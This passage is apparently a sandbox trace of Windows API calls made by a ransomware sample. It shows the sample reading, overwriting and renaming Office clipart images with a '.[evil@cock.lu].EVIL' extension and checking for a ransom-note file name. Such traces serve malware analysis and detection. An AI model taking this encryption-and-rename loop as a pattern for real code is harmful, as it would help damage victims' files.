(_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG") returned 0x45 [0156.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382938.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.575] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x184d3, lpOverlapped=0x0) returned 1 [0156.584] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.584] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.584] _errno () returned 0x84b1160840 [0156.584] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.584] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x184e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x184e0, lpOverlapped=0x0) returned 1 [0156.585] CloseHandle (hObject=0x1a8) returned 1 [0156.585] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.585] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.585] __uncaught_exception () returned 0x84b1160800 [0156.585] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.585] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382938.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382938.jpg.[evil@cock.lu].evil")) returned 1 [0156.586] ??_V@YAXPEAX@Z () returned 0x1 [0156.590] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG", dwFileAttributes=0x200) returned 0 [0156.590] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.590] wcsstr (_Str="J0382939.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.590] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG") returned 69 [0156.590] wcscmp (_String1="J0382939.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.590] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382939.JPG") returned 0x0 [0156.590] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG") returned 0x45 [0156.590] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382939.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.592] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1aba5, lpOverlapped=0x0) returned 1 [0156.601] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.601] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.601] _errno () returned 0x84b1160840 [0156.602] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.602] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1abc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1abc0, lpOverlapped=0x0) returned 1 [0156.602] CloseHandle (hObject=0x1a8) returned 1 [0156.602] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.602] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.602] __uncaught_exception () returned 0x84b1160800 [0156.603] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.603] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382939.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382939.jpg.[evil@cock.lu].evil")) returned 1 [0156.604] ??_V@YAXPEAX@Z () returned 0x1 [0156.607] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG", dwFileAttributes=0x200) returned 0 [0156.608] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.608] wcsstr (_Str="J0382942.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.608] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG") returned 69 [0156.608] wcscmp (_String1="J0382942.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.608] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382942.JPG") returned 0x0 [0156.608] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG") returned 0x45 [0156.608] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382942.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.610] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1653a, lpOverlapped=0x0) returned 1 [0156.619] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.619] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.619] _errno () returned 0x84b1160840 [0156.619] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.619] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x16540, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16540, lpOverlapped=0x0) returned 1 [0156.619] CloseHandle (hObject=0x1a8) returned 1 [0156.620] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.620] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.620] __uncaught_exception () returned 0x84b1160800 [0156.620] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.620] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382942.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382942.jpg.[evil@cock.lu].evil")) returned 1 [0156.621] ??_V@YAXPEAX@Z () returned 0x1 [0156.625] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG", dwFileAttributes=0x200) returned 0 [0156.625] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.625] wcsstr (_Str="J0382944.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.625] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG") returned 69 [0156.625] wcscmp (_String1="J0382944.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.625] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382944.JPG") returned 0x0 [0156.625] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG") returned 0x45 [0156.625] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382944.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.627] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13e1d, lpOverlapped=0x0) returned 1 [0156.636] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.636] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.636] _errno () returned 0x84b1160840 [0156.636] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.637] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x13e20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13e20, lpOverlapped=0x0) returned 1 [0156.637] CloseHandle (hObject=0x1a8) returned 1 [0156.637] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.637] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.637] __uncaught_exception () returned 0x84b1160800 [0156.637] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.638] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382944.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382944.jpg.[evil@cock.lu].evil")) returned 1 [0156.639] ??_V@YAXPEAX@Z () returned 0x1 [0156.642] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG", dwFileAttributes=0x200) returned 0 [0156.642] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.643] wcsstr (_Str="J0382947.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.643] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG") returned 69 [0156.643] wcscmp (_String1="J0382947.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.643] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382947.JPG") returned 0x0 [0156.643] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG") returned 0x45 [0156.643] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382947.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.645] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1531c, lpOverlapped=0x0) returned 1 [0156.654] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.654] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.654] _errno () returned 0x84b1160840 [0156.654] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.654] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x15320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15320, lpOverlapped=0x0) returned 1 [0156.655] CloseHandle (hObject=0x1a8) returned 1 [0156.655] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.655] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.655] __uncaught_exception () returned 0x84b1160800 [0156.655] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.655] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382947.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382947.jpg.[evil@cock.lu].evil")) returned 1 [0156.657] ??_V@YAXPEAX@Z () returned 0x1 [0156.660] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG", dwFileAttributes=0x200) returned 0 [0156.660] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.660] wcsstr (_Str="J0382948.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.660] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG") returned 69 [0156.660] wcscmp (_String1="J0382948.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.660] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382948.JPG") returned 0x0 [0156.660] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG") returned 0x45 [0156.660] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382948.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.663] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ad37, lpOverlapped=0x0) returned 1 [0156.672] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.672] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.672] _errno () returned 0x84b1160840 [0156.673] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.673] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1ad40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ad40, lpOverlapped=0x0) returned 1 [0156.673] CloseHandle (hObject=0x1a8) returned 1 [0156.673] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.673] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.673] __uncaught_exception () returned 0x84b1160800 [0156.673] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.674] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382948.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382948.jpg.[evil@cock.lu].evil")) returned 1 [0156.675] ??_V@YAXPEAX@Z () returned 0x1 [0156.678] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG", dwFileAttributes=0x200) returned 0 [0156.678] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.678] wcsstr (_Str="J0382950.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.678] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG") returned 69 [0156.678] wcscmp (_String1="J0382950.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.678] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382950.JPG") returned 0x0 [0156.678] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG") returned 0x45 [0156.678] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382950.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.681] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x178d2, lpOverlapped=0x0) returned 1 [0156.690] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.690] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.690] _errno () returned 0x84b1160840 [0156.690] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.690] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x178e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x178e0, lpOverlapped=0x0) returned 1 [0156.690] CloseHandle (hObject=0x1a8) returned 1 [0156.690] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.691] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.691] __uncaught_exception () returned 0x84b1160800 [0156.691] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.691] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382950.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382950.jpg.[evil@cock.lu].evil")) returned 1 [0156.692] ??_V@YAXPEAX@Z () returned 0x1 [0156.696] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG", dwFileAttributes=0x200) returned 0 [0156.696] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.696] wcsstr (_Str="J0382952.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.696] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG") returned 69 [0156.696] wcscmp (_String1="J0382952.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.696] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382952.JPG") returned 0x0 [0156.696] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG") returned 0x45 [0156.696] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382952.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.698] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17749, lpOverlapped=0x0) returned 1 [0156.708] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.708] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.708] _errno () returned 0x84b1160840 [0156.708] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.708] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x17760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17760, lpOverlapped=0x0) returned 1 [0156.708] CloseHandle (hObject=0x1a8) returned 1 [0156.708] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.709] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.709] __uncaught_exception () returned 0x84b1160800 [0156.709] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.709] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382952.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382952.jpg.[evil@cock.lu].evil")) returned 1 [0156.710] ??_V@YAXPEAX@Z () returned 0x1 [0156.714] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG", dwFileAttributes=0x200) returned 0 [0156.714] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.714] wcsstr (_Str="J0382954.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.714] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG") returned 69 [0156.714] wcscmp (_String1="J0382954.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.714] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382954.JPG") returned 0x0 [0156.714] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG") returned 0x45 [0156.714] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382954.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.717] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, 